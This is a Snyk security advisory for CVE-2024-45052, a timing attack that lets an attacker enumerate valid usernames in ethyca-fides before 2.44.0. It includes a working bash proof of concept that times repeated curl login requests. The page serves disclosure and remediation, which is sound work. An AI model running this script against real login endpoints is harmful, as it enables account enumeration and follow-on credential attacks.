Timing Attack Affecting ethyca-fides package, versions [,2.44.0)


Severity

Recommended
0.0
medium
0
10

CVSS assessment made by Snyk's Security Team. Learn more

Threat Intelligence

Exploit Maturity
Proof of concept
EPSS
0.05% (19th percentile)

Do your applications use this vulnerable package?

In a few clicks we can analyze your entire application and see what components are vulnerable in your application, and suggest you quick fixes.

Test your applications
  • Snyk IDSNYK-PYTHON-ETHYCAFIDES-7897492
  • published5 Sept 2024
  • disclosed4 Sept 2024
  • creditRobertKeyser

Introduced: 4 Sep 2024

CVE-2024-45052  (opens in a new tab)
CWE-208  (opens in a new tab)

How to fix?

Upgrade ethyca-fides to version 2.44.0 or higher.

Overview

ethyca-fides is an Open-source ecosystem for data privacy as code.

Affected versions of this package are vulnerable to Timing Attack due to the discrepancy in response times between valid and invalid usernames in the login endpoint. An attacker can determine the existence of valid usernames by analyzing the time it takes for the server to respond to login requests. By exploiting this vulnerability, an attacker can enumerate users on the system.

PoC


#!/bin/bash

# Function to test login and calculate average transfer times
test_login(){
  echo -e "\nTesting login for user: $1\n"
  total_diff=0

  for (( i=1; i <= 20; ++i ))
  do
    echo -n "Attempt #$i: "
    resp=$(curl -w @- "$LOGIN_URL" \
      -H 'content-type: application/json' \
      --data-raw '{"username":"'$1'","password":"d3JvbmdwYXNzd29yZA=="}' \
      -o /dev/null -s <<'EOF'
      {
        "pretransfer":  %{time_pretransfer},
        "starttransfer": %{time_starttransfer}
      }
EOF
    )
    
    pre=$(echo $resp | jq '.pretransfer')
    start=$(echo $resp | jq '.starttransfer')
    diff=$(echo "$start - $pre" | bc)

    # Accumulate total diff
    total_diff=$(echo "$total_diff + $diff" | bc)
    
    # Print the result of this iteration
    printf "Pretransfer: %.4f, Starttransfer: %.4f, Diff: %.4f\n" "$pre" "$start" "$diff"
  done
  
  # Calculate average diff
  avg_diff=$(echo "scale=4; $total_diff / 20" | bc)
  
  # Print average time
  echo -e "\nAverage Time Difference for $1: $avg_diff seconds\n"
}

# Ensure that LOGIN_URL is set
if [ -z "$LOGIN_URL" ]; then
  echo "Error: LOGIN_URL environment variable is not set."
  exit 1
fi

# Test valid and invalid users
test_login valid_user 
test_login invalid_user

References

CVSS Scores

version 4.0
version 3.1